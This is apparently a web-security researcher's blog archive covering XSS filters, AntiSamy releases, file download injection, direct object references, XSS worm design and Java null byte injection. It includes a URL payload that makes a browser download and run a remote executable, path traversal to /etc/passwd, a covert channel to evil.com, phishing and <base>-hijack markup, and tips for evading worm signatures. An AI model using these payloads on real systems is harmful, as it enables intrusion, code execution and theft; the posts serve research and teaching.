omg.wtf.bbq.

because arshan’s too cheap to license OneNote

Browsing Posts published by arshan dabirsiaghi

I caught up with Michael Eddington’s short and sweet analysis of the request validation in ASP.NET 2.0. So far I’ve seen a few people blast it, but I think it will actually help ASP.NET security against XSS in general, thanks to the Pareto principle (also called the 80/20 rule). I’ll quickly summarize Mike’s post and the situation in general.

ASP.NET 1.1 had relatively strong blacklist protection against XSS turned on by default. There were a few ways discovered to get around the blacklist, but after the hotfixes were released it seemed pretty strong. It was, in fact, too strong for its own good, however. It “catches” so much that developers frequently turn it off. Anecdotally I can say that most (70-80%) of the ASP.NET applications I look at explicitly disable the feature.

Then, in ASP.NET 2.0, Microsoft dumbed down the request validation significantly. To quote Mr. Eddington:

While asp.net v2.0 and higher performs the following:

  1. Look for &#
  2. Look for ‘<’ then alphas or ! or / (tags)
  3. Skip elements with names prefixed with double underscore (__)

So, after thinking about this for about 30 seconds we can at least see that they’re vulnerable to the following types of attacks:

  • Attribute-based XSS (injecting into an attribute)
  • JavaScript-based XSS (injecting into JavaScript)
  • UTF7/US-ASCII encoded attacks

So this is a step backwards for Microsoft right? Were they just munching on FAIL cookies?

Microsoft developers fail?

They no longer look for event handlers, expression calls, etc. This is great for attackers, right? This means that I can focus more on improving my Halo 3 scores and banging that Michelle chick in GTA IV since XSS is now much easier to perform? Well, those are very important goals, but I think the truth is that this helps Microsoft customers reduce the number of XSS incidents they’ll have.

Let’s think about the facts:

  1. The validation strength in ASP.NET 1.1 was very strong
  2. Most everybody turned off request validation in ASP.NET 1.1
  3. The request validation in ASP.NET 2.0 is weaker than 1.1
  4. Most people will leave on request validation in ASP.NET 2.0

If this holds, the security will actually be better. The big assumption of my argument lies in #4. I’m assuming that because the 2.0 validation mechanism won’t be as big a roadblock to developers, it will be left on. Developers may though, out of habit, just turn it off.

Maybe I’m giving them too much credit, but I bet Microsoft analyzed the XSS vulnerabilities customers produced and found that some percentage, say 75%, were what I call “body” XSS vulnerabilities – those that are not attribute-based/JavaScript-based/DOM-based. So, the 80/20 rule comes into play. If they prevent “body” XSS vulnerabilities (I hate the name, please don’t use it), they eliminate 75% of the vulnerabilities. This is better than the 0% they were preventing before when developers were turning it off completely.

True, the ASP.NET validation, when looked at as an XSS validation mechanism without context, appears to be something Shooter McGavin would eat for breakfast since it doesn’t stop all attacks. However, in its new version, it will stop most of the attacks (the “body” XSS vulnerabilities) while not interfering with developers.

It seems like voodoo that they actually may improve their security by weakening it. Although, my question after writing this post is- what problems and legitimate test cases did developers fail with request validation on? Should users be legitimately allowed to send in strangely encoded data or HTML tags? Sounds like Giorgio’s problems with “false positives” with NoScript (hilarious read).

I’m happy to say there’s a new version of AntiSamy out today! There were many more changes between 1.1 and 1.1.1 than there were from 1.0 to 1.1! And I’m thrilled about that, if that makes any sense – it means that usage really grew! Many international users made requests and e-mailed fixes to the mailing list. Also, some other folks expressed interest in figuring out better and more consistent HTML entity translation. Hopefully everyone will be happy as I feel like I’ve addressed almost all of the open issues and even included a few enhancements. In the future, if you find a problem, I suggest you email the mailing list to get my attention, but also fill out an issue on the project issues page. You can test out the 1.1.1 version on the AntiSamy test page.

Also, as of the new 1.1.1 version, AntiSamy is being shipped with the OWASP ESAPI project – ESAPI can officially do everything now! Anyway, it’s ready for download from the project page. Here’s the official changelist:

  • Began using (X)HTMLSerializer instead of XMLSerializer to recognize HTML entities
  • Removed any invalid XML characters before processing in order to avoid XML exceptions (thanks to Gareth Heyes, Michael Coates, et. al. who discovered independently)
  • Fixed code to remove any lingering Java 1.5 dependencies (for real this time)
  • Cleaned up AntiSamy() main method to be a little more organized
  • Fixed the “dangling quote” scenario which could cause XSS if a getCleanHTML() call ended up inside a textbox value attribute
  • Added *true* XHTML support with new directive in policy file (“useXHTML”
  • Introduced the ability to specify encoding for input and output (will still rely on you setting your page charsets appropriately though)
  • Made the policy files tolerant of non-latin characters for i18n support
  • Removed automatic HTML entity translation support (HTML entities are international, ASCII character code points (e.g. &#160; ) aren’t)
  • Upgraded nekohtml to version 1.9.7
  • Upgraded Xerces to 2.9.1

Many thanks for all the help from those who spent their time since 1.1 making AntiSamy a better tool. I’d like to send extra special thanks to Joel Worral and Raziel Alvarez for their diligent research. I owe you guys much beer/wine/whatever you drink in your part of the world!

My boss Jeff Williams came up with something very clever while my company (Aspect Security) was participating in NIST’s Static Analysis Tools Exposition (SATE). Basically, NIST challenged all the major static code analysis vendors to a massive bakeoff sponsored by DHS. Being a consulting company that mainly performs code reviews and penetration tests, we couldn’t stand to sit on the sidelines while our portion of the industry was basically being written off like Dunder Mifflin. So Jeff sent a tongue in cheek letter suggesting that we be allowed to enter. The response from NIST was shockingly responsive – nice to know there’s a part of NIST that I can still trust.
Anyway, in one of the bakeoff test applications, we found a piece of data that was run through a pretty good blacklist before being stuck into a Content-disposition HTTP header. Great – that means header injection! But wait – we can’t do XSS or response splitting because of the characters in the blacklist! What can we do?

The Attack

(Well, in the end we actually did come up with an XSS vector using UTF-7 and some other stuff, but forget about that for now.)

Here’s the Java code that’s vulnerable to HTTP header injection:

response.setContentType(“application/octet-stream”);
response.setHeader(“Content-Disposition”, “attachment; filename=” + request.getParameter(“fn”) );

Jeff’s bright idea: pass in attack.bat%0a%0d%0a%0dwordpad

Let’s look at the layout of the resulting HTTP response when we pass that in:

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Set-Cookie: JSESSIONID=E35E52B9472B17666B3A77C19CDCD90E; Path=/download
Content-Disposition: attachment;filename=attack.bat

wordpad
Content-Length: 0
Content-Type: application/octet-stream;charset=euc-k

What’s in red is our attack code. There’s not many special characters and it’s even more deadly than XSS – remote file execution! The user’s browser downloads a file called “attack.bat”, and kicks off a batch file containing whatever commands we want to execute. In the example we just kicked off wordpad. Notice that the remaining HTTP headers are included after our payload, but that doesn’t seem to present any real problem we can think of, especially since we may be able to control the content length and exclude that stuff in most cases. Here’s an example attack string that gets and executes a random executable off the net.

http://[trusted_domain]/download?fn=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20mirror.aarnet.edu.au%0d%0awzinet95.exe

There’s a downside for attackers here though – if you try to kick off any kind of executable file extension, the browser pops up a warning. However, because the link resides on a trusted domain it remains a very effective attack. Response splitting can result in a mass-effect cache poison, but this attack (File Download Injection) is a very non-theoretical, low-tech attack that has a very realistic chance of being exploited (now that the attackers know about it – thanks, Jeff). So, the advice stays the same. Don’t click on anything, ever, despite any promises of getting nudey pictures of Jenna Fischer.

There’s more you can do besides forge a quick batch file too. Some of the extensions get kicked off automatically (no popup warning), like QuickTime’s .mov.  But because this attack is a reflected link attack, the “body” of the file you want the user to download has to be relatively small as the whole thing must be contained in the malicious URL. IE has maximum of 2,083 characters in  a URL, but having a massive URL is a problem more because such a large URL will look suspicious rather than because of any exploitability constraints. With that said – there’s a host of platforms, browsers, and file extensions that have not been tested – so after some research you might find a more deadly extension to use than .bat.

How does this relate to XSS?

The pattern is close – bad input in, bad input out. If bad input ends up in an HTTP header, you can do this. If it ends up in an HTTP response body, you just have XSS. File Download Injection has a higher impact and a lower likelihood than XSS. The impact is easy to calculate – compare the impact of JavaScript injection vs. the impact of remote arbitrary command execution. However, that is balanced by the fact that the likelihood of a user ignoring a pop-up warning lowers the chances of a successful attack. So in the end, I think this will end up rating the same risk as traditional header injection/XSS findings

Even though I think this is a pretty neat addition to the attacker’s toolbelt, Jeff’s release got a resounding thud when he published it on places such as Bugtraq, webappsec mailing list, and others. Maybe in hindsight, publishing during RSA was not the best time. At least Arian Evans said some nice stuff about it, and echoed my sentiments exactly when he said we should stop calling HTTP Header Injection by its least likely attack variant, HTTP Response Splitting. While we’re on that subject, we should also stop calling XSS by its current name – it’s JavaScript injection. What the hell is cross-site scripting, anyway? JSI is just as sexy an acronym as XSS, and it actually makes sense. Until next time!

This is your every day, ticket serving Amtrak kiosk. Look familiar?

I love taking the train. God, the only thing better than taking the train would be taking the train for free.

Whoops. Thanks for the ticket, Marge Power, traveling from Alexandria, VA.

How was I able to do this? Direct object references (DOR). Laughably, ridiculously easy attacks. Is this a Diebold product? It’s no wonder that with this level of security, a 14 year old kid from Kerplakistan with a pasta drainer, wireless mouse and a shoebox was able to completely derail their trains. I’ve told my the webappsec classes that the easiest way to steal a bunch of information from a website is through direct object references. My wife could perform a DOR attack, and if you think she knows anything about security, I can just tell you she has like 5,000 Facebook applications with full privileges running.

So, let’s get to the really gory, technical details of this Mitnick like hack.

My confirmation number was 01CF01.

I typed in 01CF04.

Maybe it was by accident, Amtrak, and maybe it wasn’t. Regardless, I got Marge’s ticket offered to me. Look at the screen again. See the “Print Tickets” option? I’m sure this does happen all the time by accident. Whoever made this horribly insecure contraption knew that, too, because on the first picture, if you look closely, there’s a “Not you? Click here to try another confirmation number” button as well. You don’t need an ID to board a train, remember.

Incidentally, Marge Power is such a badass name. That’s why I didn’t get her tickets out. She sounds ripped. Anyway, imagine the same kind of functionality on a website:

http://bank.com/viewProfile?accountID=101

Hrm. How about 102? Or:

http://bank.com/viewReport?file=arshan.pdf

Hrm. How about ../../../../etc/passwd? When we learn to program, we’re not taught security. We’re taught to pass our test cases and include as much functionality as we can. Maybe we can sneak in a little blurb about data ownership into our curriculum, say, instead of DFDs or UML or anything else that 90% of web developers never even use? Even harder to imagine teaching doe-eyed comp sci students security is the prospect of teaching stuffy old professors about security.

Anyway, hope your March Madness brackets are doing well. I have my alma matters Towson University and Essex Community College meeting in the final, with Essex snatching the victory in classic underdog fashion from Towson in triple overtime – on a jumper from some 19-year old father of 2, making the end score 45-44. Sure, neither were in the tournament, but you know how those later rounds are weighted. If I nail the final I’m taking home the dough.

I’m happy to say that the OWASP AntiSamy 1.1 Java API is officially out! Thanks to everyone on the OWASP AntiSamy mailing list for helping me get a better API out the door. There were really only 5-6 changes worth getting excited about. Here are the highlights:

  •  Removed accidentally included internal Sun JRE classes (com.sun.*) and replaced with Xerces classes. this fixes the NoClassDefFound error you’d encounter on non-sun JREs (like in IBM WebSphere)
  • Re-factored code to remove reliance on setUserData() method to allow the code to run in Java 1.4
  • Escaped ‘#’ in onsiteURI regular expressions to address a known bug in the JVM which interpreted the hash mark as  a comment character inside of character class definitions, e.g. [0-9A-Z,/#]. This flaw allowed disallowed protocol URLs (credits to Richard Rodger of Ricebridge Software for discovering this)
  • Changed code comment accidentally crediting HTMLCleaner with the cleaning – should be NekoHTML!
  • Also, we’ve got the JavaDocs online at Google!

The API is in a good place, and it’s getting the attention of a lot of people. I said from the beginning that if 10 people found AntiSamy useful I’d consider it a success. Considering the thousands of times AntiSamy materials have been downloaded, I really couldn’t be happier about how things have turned out.

However, I don’t want stay in just the Java world. Early goals for AntiSamy included getting a .NET and PHP version ready by Spring 2008 – that’s still very possible, but not without help. Luckily, it appears that the Stas Malyshev from the Zend group (think OWASP Incorporated, mega-focused on PHP) is looking to start the project. I planned to do the .NET version but I’ve been mega busy with other research. Hopefully I can find some OWASP Summer of Code money to get this done! Anybody from the OWASP .NET project feel like collaborating?

One of the cooler tools in the webappsec hacker’s handbook is Hackvertor. It’s a smart encoding tool written by Gareth Heyes that helps you craft XSS vectors that pass whatever filters you’re trying to evade. Rather than wasting 3 paragraphs describing it, you should just go try out this example that Gareth showed me for obfuscating a simple alert(document.cookie). Check out the Hackvertlet and HVURL features!

Anyway, for obfuscating a single payload to bypass a filter, Hackvertor is excellent. However, my recent research into next generation XSS worms requires some more qualities concerning it’s polymorphic capability. For example, although a single obfuscated payload (a la Samy’s worm code) can propagate all over an infected application, that application is extremely easy to clean with a simple search-and-destroy on the payload code.

I call this type of worm a “Teflon worm”. Get it? Teflon’s easy to clean. If you don’t think that’s funny, you should read it again and reconsider. If you still don’t think it’s funny, listen to this mp3 and let me take credit for being funny by association

To avoid that easy-to-clean Teflon type of payload we need a polymorphic worm that has different payloads. However, they can’t just be different. They have to be difficult to signature. So, a payload that goes from stealCookie24(document.cookie) to stealCookie25(document.cookie) is an improvement, but it’s still not great because the payloads generated will be easy to signature. Really, any deterministic algorithm for shifting payloads will be easy to signature after some analysis.

Another problem with Hackvertor-generated payloads is that they still contain strings that would commonly be blacklisted, such as document.cookie. These few issues shouldn’t be considered “weaknesses” in Hackvertor. The polymorphing code a good worm will need from infection-to-infection are one contextual level up from Hackvertor and bypassing a blacklist is not in and of itself a challenge you need Hackvertor for. However, it would be much more useful if the tool added automatically fragmented and re-assembled these keywords (perhaps any literal string in the payload).

The goal is not to just to avoid eschewing obfuscation, but to actively camouflage our data among other users’ data. To do that, we’re going to need a non-deterministic method of expressing a JavaScript “idea”. Assuming Hackvertor is the tool to help us make this happen, here are 3 key ways we can move Hackvertor towards that destination:

Combining and Layering

A real polymorphic algorithm will randomly combine and layer multiple encoding transformations on the payload. This doesn’t mean you just take 5 algorithms and run the payload through 3 of them. This means looping through a random number of iterations, taking randomly sized substrings of the payload and running them through multiple layers of encoding.

Random Expressiveness

Encoding is one way of performing transformations. Another way of performing transformations is altering the expressions of full or partial JavaScript statements. An example transformation would turn “alert(” into “alert (“. Another transformation would take that statement and turn it into “/*ZXC*/alert (“. Because of the expressiveness of JavaScript, you could create hundreds of these types of transformations.

Out-of-order String Fragmenting

One of the failures of many of the encoders I see is that when they fragment keywords to avoid blacklists, they fragment them in a way that is easy to see through for a computer. For example, take these two pieces of Samy’s exploit code:

  1. eval('document.body.inne'+'rHTML')
  2. eval('J.onr'+'eadystatechange=BI')

Can you use this fragmenting technique to beat any blacklist? Not a 3-D blacklist. Let’s run these things through a filter that removes everything that’s not alphanumeric. The results: evaldocumentbodyinnerHTML and evalJonreadystatechangeBI – and now our blacklist works again. I call this technique a 3-D blacklist because it gives depth to data. It’s an absolutely terrible mechanism and easily beatable, but it would work today because nobody’s trying to beat it. The way to beat it? Don’t fragment your bad words in order. Reverse the order, make it random, etc.

Whenever I teach a class on webappsec, I mention Samy’s worm. Of the whole thing, his fragmenting technique is the piece that seems to impress the students most. It’s simultaneously very simple and very clever. Once I’m done breaking down the worm, however, I let them know how ugly Samy is to quickly prevent his already out-of-control fan club from growing any more. Okay, I don’t tell them he’s ugly. Only because everyone that saw us at OWASP San Jose kept saying we looked alike. Jeff Williams found this picture of how he looks much more like Vladimir Lenin, which, by the transitive nature of comparison, means I look like Lenin. You be the judge:
Samy KamkarVladimir Lenin

samy, lenin, then me (and my mail order bride Jen).

Anyway, Gareth has told me he will be implementing these features in the future and that we should keep an eye on his blog. The next great XSS worm can’t be easy to signature, so this is important research.

In closing, go Liverpool!

I am submitting a paper for Blackhat USA and the OWASP Belgium and NYC conferences. These are exciting times. Blackhat is always cool, Belgium is far away, and I know Tom Brennan will put on a great show in NYC. The title of the paper, which I’m not glued to yet, is “Building And Mitigating Next-Gen XSS Worms: Techniques in Attacking and Defending in Web 2.0″. If that doesn’t work, I may rely on my safety paper: “Brokeback XSS: Why Jeremiah and Robert Can’t Quit Each Other, or XSS”. Anyway, here’s the abstract of the paper I’m proposing:

“There has been much analysis of the recent MySpace and Yahoo! cross-site scripting worms. While the web development world slowly comes to recognize self-propagating web attacks, attackers are in the wild, presumably improving on the work of their predecessors.

In this paper we will analyze the design choices made by past worm authors and hopefully illuminate how future attackers will improve on the current paradigm when building the next generation of cross-site scripting worms. Also, the paper will highlight some new defense mechanisms in both preventing current and next generation cross-site scripting worms, and include some original recommendations on how to respond to such attacks.”

Abstracts don’t really say a whole lot. Not to give it all away, but some of the topics will include:

  • dynamic XSS command-and-control channels
  • egress malware filtering rules
  • polymorphic payload code
  • content restrictions
  • distributed scanning

I plan on finishing the paper within the next 2 weeks and I also plan on getting it accepted. If it doesn’t I’ll have plenty of blogging material, but I think this is stuff a lot of the webappsec community will find very interesting.

Also, Sarah: I’m sorry you hate my blog. But there’s one thing you can’t deny.

There has been a lot of research into ways of getting around the same origin policy. What if the browser sandbox we’re all trying to figure out a way of implementing prevents you from adding various tags into the DOM dynamically? So, I imagine a common “sandbox” would prevent bad guys from dynamically inserting <script>, <link>, and <iframe> elements into the DOM. Is there anything else we could do to bypass the same origin policy? This is what the question is (or what it turned into as I was exploring it the other day) when trying to figure out an XSS worm C&C channel in a post-content restrictions world.

Disclaimer: I know this isn’t earth-shattering now when the sandbox isn’t there, but I think it’s cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we’re on http://evil.com/ and we’re talking to http://mybank.com/. We’re talking about a hijacked client who’s in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it!

Here’s how it works.

  • Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret
  • Server responds with an image that has a 16 pixels tall and 1 pixel wide (16 represents in this phase the total length of the payload)
  • Client then starts a loop that iterates 16/2 times:
    • Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i=<loop_index>
    • The new image that has height x, width y
    • Client appends ASCII character value of x onto payload string
    • Client appends ASCII character value of y onto payload string
  • Client now has authenticated, 16-length payload to do whatever they want with

Payloads can be of arbitrary length and transfer surprisingly fast. The client side code for the POC is here, and the server side code is here. To verify the POC in Firefox, go to the client side page and let it finish loading (it goes quick) and then type “javascript:alert(payload)” in the address bar. This hasn’t been tested in IE, but whatever. Same thing. If I were malicious I’d spruce it up with some shimmering/port knocking style authentication on the malicious server.The good news for attackers is there will probably always be ways of getting around the same origin policy using techniques like this to distribute payloads. As far as getting arbitrary off-domain data, shrug, screwing up the implementation is always possible.

On this topic, my boss Jeff Williams pointed me to a neat paper about improving the reliability of the SOP implementations in IE using a technique called Script Accenting. I haven’t heard too much about this out there on the Interwebs besides a brief analysis on RSnake’s site and it’s really effective for preventing cross-frame SOP violations, but not for scripts that were injected using XSS. Either way, great read but I’m not 100% convinced of its reliability – something about using XOR as a security mechanism, even with their well-reasoned defenses, tickles my Spidersense as being a shaky precipice.

Anyways, happy January!

One of the things I highlighted in my paper on AntiSamy was the fact that JavaScript is often the only thing we think of when we hear the term “malicious code” in terms of webappsec. Let’s suppose that’s false for a second. The question then becomes: If MySpace can strip out all your JavaScript, what can you do maliciously when only providing pure HTML/CSS (besides invoking JavaScript from intrinsic events, CSS image-lookups, hilarious 3rd-party stupidity, etc.)? Also, we’re ignoring all the obvious meta-iframe-redirect-to-malware type stuff.

Here are the 3 things I came up with. Two are original.

1. <div> overlay affecting phishing attacks

These are pretty old hat too. The idea here is you provide some CSS in the part of the page that you supply that creates a <div> that overlays some or all of the page, including the part you don’t own. To see this kind of attack in action, try sticking the following code onto my AntiSamy test page, and make sure you attack against the default/vulnerable antisamy.xml policy file:

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Welcome to MyGoat!!1! Please Login wit credentialz for major nigerian cash<br><form name="login" action="http://aspectsecurity.com"><table><tr><td>Username: </td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

2. <div> hijacking

So, if you’re interested in this stuff, you’re probably a hacker. I can surmise then, that’s you’re lazy and have criminal inclinations. Am I projecting? Hope not. Assuming you are – well, why create an absolutely positioned <div> when you can just steal the existing one? Let’s say that MySpace has this code at the top of their page:

<div id="main_logo"> <img src="/main_logo.gif" mce_src="/main_logo.gif"> </div>

Then, the attacker’s profile comes along later and let’s say they supplied this:

<div id="main_logo"> <img src="http://evil.tld/hacked.gif" mce_src="http://evil.tld/hacked.gif"> </div>

Guess what comes up where the main logo appears? Well, don’t take my word for it. Go try it out on my test page. Provide the following attack code and watch the header image carefully:

<style>
div { }
div#header * {
 display: none;
}
div#header {
background-image:url(http://www.aspectsecurity.com/images/footer_aybabtu.jpg);
background-repeat:no-repeat;
width: 800px;
height:60px;
}
</style>

Ugh, this turns out to be pretty problematic when you think it through. So, if we want to allow users to create their own <div> tags, we have to allow them to specify id values so they don’t have to write annoying inline CSS for everything. On the other hand – if we allow users to specify the id attribute, they could use it to hijack our legitimate <div> areas.

What a pickle. AntiSamy “solves” this problem by allowing the application to specify “protected” id values. So, you can setup a list of specific id values that are protected or you can specify a pattern, like “myspace_*”. So, if the user tries to specify an id that begins with “myspace_”, they’ll get an error. This means your developers have to be aware of the naming convention and be on board with its purpose.

Can it get worse? 

3. <base> external resource hijacking

Yes, it can. Well, phishing doesn’t really get me out of bed in the morning. That’s what Anna Faris is for. We’re here for something more. What’s great about this attack vector is the fact that it allows me to revive a gaming joke from 2001. The <base> tag tells browsers that all relative tag resources encountered from that point forward can be found beneath the URL in the <base> tag’s href attribute.  See where this is going? It plays out like this.

<!-- begin user supplied content (eBay) -->
omFG bai my boba fett dollz it totally sets u UP the bombz
<base href="http://evil.tld" mce_href="http://evil.tld">
<!-- end user supplied content (eBay)
<script src="/do_ebay_stuff.js" mce_src="/do_ebay_stuff.js"></script>

When the browser encounters the <script> tag, it’s going to try to find it at http://evil.tld/do_ebay_stuff.js. So, all you have to do is make sure there’s something malicious living at that URL and you’re disco.

Couple of things about this attack:

  • It’s pure HTML. Awesome.
  • Like a remote script/CSS include, the application has no idea what malicious code the victim was tricked into executing. Double awesome. The code is in the cloud, baby.
  • It’s an original vector. RSnake has this similar-looking vector on his cheat sheet: <BASE href=”javascript:alert(‘XSS’);//”>. This is a localized JavaScript call because browsers were too dumb to realize this URL doesn’t make any sense (and this doesn’t even work anymore).
  • Browsers can’t patch it!
  • IE7 has decided it won’t honor <base> tags it finds outside of the <head> element, so IE7 is probably not a concern for this vector because it’s unlikely that untrusted users will be injecting into a page’s <head> element. Making a dirty joke about this bullet is left as an exercise to the reader.

Legally, I’m not allowed to write this section without reminding you that someone set us up the bomb.


So, those are a few ideas for non-JavaScript malicious code. If you have anything to add, plz feel free to do so!

So my co-worker Eric Sheridan was talking about an attack scenario in one of our recent assessments where he left a note to the effect of, “we could download any file with this vulnerability if null byte injections work in Java – testing needed”. Interesting. Five minutes later I’ve got some test cases and as sure as I am a good looking Persian man, the thing works. Am I an idiot? How did I not know this? Let’s see if Google knew. If Google doesn’t know, then I won’t kill myself. Woohoo! Try plugging “java null byte injections” into Google. Absolutely nothing useful comes up.

Earlier this year, Paul Craig at security-assessment.com published his research on null byte injections in .NET. A natural step would be to go check Java next – managed language survey! Maybe somebody did and found nothing – it would have been easy to miss. Craig’s research found that 5 methods in the entire .NET framework mishandle the null byte. I’ve done some limited research and only found 2. However, I’m sure there are more. So, let’s look at some vulnerable code:

String path_to_file = request.getParameter("target") + ".xls";
File f = new File(path_to_file);
deliver_to_user(contentsOf(f));

In similar PHP/C/C++ code we’d be quick to use the infamous poison null byte (whose history can be found here and here) here to view any arbitrary file on the system. But it also works in Java because the File(file_path) passes the user input to open(1) or its Windows equivalent, which is written in C. It’s unclear whether the Java VM (which is written in C/ASM) is where the content after the null byte gets truncated, or if the dirty string makes it all the way to the system call itself.

As Eric pointed out, these unmanaged code issues keep haunting us, but overall of course the situation is a lot better. Anyway, check out my test cases and if you can think of additions or find a new vulnerable API, keep everyone in the loop with a comment! Also, keep an eye on the next WebGoat version as Eric has cooked up a null byte lesson.

Cheers!

Bonus game: Who will win the know-it-all/complete liar award by posting that they knew this 5 years ago?